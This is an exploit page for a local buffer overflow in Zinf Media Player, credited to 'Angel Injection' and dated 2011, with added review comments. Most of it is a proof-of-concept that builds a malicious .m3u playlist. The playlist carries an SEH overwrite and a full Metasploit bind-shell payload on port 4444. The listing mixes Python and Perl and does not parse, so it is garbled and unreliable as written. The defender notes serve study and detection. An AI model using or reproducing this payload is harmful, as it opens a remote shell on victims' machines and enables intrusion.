
Zinf Media Player本地缓冲区溢出漏洞


EXP

#!/usr/bin/python
# Proof-of-concept generator published for a Zinf Media Player local buffer
# overflow (dated 25/8/2011 in the banner below). Its only intended effect is
# to write a crafted playlist named test.m3u into the working directory.
#
# NOTE(review): as posted, the listing does not parse. It mixes Python 2
# statements with Perl fragments (`my $shellcode =`, `.` string concatenation,
# `$exit=<>;`), the indentation is inconsistent, and the `try` has no
# `except`/`finally`. Read it as a description of the file layout, not as a
# working tool.
#
# Defender notes:
#   * .m3u is a plain-text playlist format. A sample holding a run of 1300
#     identical bytes with no line break, followed by non-printable bytes, is
#     anomalous and can be flagged by content inspection before it reaches a
#     player.
#   * The variable names (next_seh, seh) indicate the buffer is laid out to
#     overwrite a structured-exception-handler record. SafeSEH/SEHOP, DEP and
#     ASLR are the standard mitigations for this bug class.
#   * The page names no affected version, CVE or vendor fix.

import sys

# Banner: title, author credit, date and site links as printed by the author.
print "########################################################################"
print "# Exploit Title: Zinf Media Player Local Buffer Overflow               #"
print "# Author: Angel Injection                                              #"
print "# Email: email protected                                   #"
print "# Date: 25/8/2011                                                      #"
print "# Home Page: http://1337day.com http://dev-point.com http://sec-krb.org#"
print "########################################################################"


try :

   # Filler: 1300 bytes of 0x41 ('A'). Presumably the distance from the start
   # of the buffer to the exception record -- not verifiable from this page.
   junk = "\x41" * 1300
   # Four bytes for the slot named "next_seh": EB 06 is an x86 short jump
   # forward by 6 bytes, padded with two 0x90 (NOP) bytes.
   next_seh = "\xEB\x06\x90\x90"
   # Four bytes for the slot named "seh" (0x1205040C when read little-endian).
   # NOTE(review): the page does not say which module this address belongs to.
   seh= "\x0C\x04\x05\x12"
   # 20 bytes of 0x90 padding placed ahead of the payload.
   nop = "\x90" * 20
    # win32_bind -  EXITFUNC=calc LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
    # NOTE(review): the generator label above describes an encoded bind
    # payload on TCP port 4444. The bytes are not analysed here; if the label
    # is accurate, a media-player process opening a listening socket is a
    # high-signal detection.
    # The declaration below is Perl, not Python (see the header note).
my $shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9a".
"\xb8\xbb\x46\x83\xeb\xfc\xe2\xf4\x66\xd2\x50\x0b\x72\x41\x44\xb9".
"\x65\xd8\x30\x2a\xbe\x9c\x30\x03\xa6\x33\xc7\x43\xe2\xb9\x54\xcd".
"\xd5\xa0\x30\x19\xba\xb9\x50\x0f\x11\x8c\x30\x47\x74\x89\x7b\xdf".
"\x36\x3c\x7b\x32\x9d\x79\x71\x4b\x9b\x7a\x50\xb2\xa1\xec\x9f\x6e".
"\xef\x5d\x30\x19\xbe\xb9\x50\x20\x11\xb4\xf0\xcd\xc5\xa4\xba\xad".
"\x99\x94\x30\xcf\xf6\x9c\xa7\x27\x59\x89\x60\x22\x11\xfb\x8b\xcd".
"\xda\xb4\x30\x36\x86\x15\x30\x06\x92\xe6\xd3\xc8\xd4\xb6\x57\x16".
"\x65\x6e\xdd\x15\xfc\xd0\x88\x74\xf2\xcf\xc8\x74\xc5\xec\x44\x96".
"\xf2\x73\x56\xba\xa1\xe8\x44\x90\xc5\x31\x5e\x20\x1b\x55\xb3\x44".
"\xcf\xd2\xb9\xb9\x4a\xd0\x62\x4f\x6f\x15\xec\xb9\x4c\xeb\xe8\x15".
"\xc9\xeb\xf8\x15\xd9\xeb\x44\x96\xfc\xd0\xaa\x1a\xfc\xeb\x32\xa7".
"\x0f\xd0\x1f\x5c\xea\x7f\xec\xb9\x4c\xd2\xab\x17\xcf\x47\x6b\x2e".
"\x3e\x15\x95\xaf\xcd\x47\x6d\x15\xcf\x47\x6b\x2e\x7f\xf1\x3d\x0f".
"\xcd\x47\x6d\x16\xce\xec\xee\xb9\x4a\x2b\xd3\xa1\xe3\x7e\xc2\x11".
"\x65\x6e\xee\xb9\x4a\xde\xd1\x22\xfc\xd0\xd8\x2b\x13\x5d\xd1\x16".
"\xc3\x91\x77\xcf\x7d\xd2\xff\xcf\x78\x89\x7b\xb5\x30\x46\xf9\x6b".
"\x64\xfa\x97\xd5\x17\xc2\x83\xed\x31\x13\xd3\x34\x64\x0b\xad\xb9".
"\xef\xfc\x44\x90\xc1\xef\xe9\x17\xcb\xe9\xd1\x47\xcb\xe9\xee\x17".
"\x65\x68\xd3\xeb\x43\xbd\x75\x15\x65\x6e\xd1\xb9\x65\x8f\x44\x96".
"\x11\xef\x47\xc5\x5e\xdc\x44\x90\xc8\x47\x6b\x2e\x6a\x32\xbf\x19".
"\xc9\x47\x6d\xb9\x4a\xb8\xbb\x46";
    # Opens test.m3u for writing and emits the five parts in order:
    # filler, next_seh, seh, padding, payload.
    f = open("test.m3u" ,"w")
f.write(junk + next_seh + seh + nop + shellcode)
    f.close()

# Perl-style "wait for a line of input, then echo it" epilogue; the last two
# statements are not valid Python.
print "* Press Any Key To Exit ...";
$exit=<>;
print $exit ;
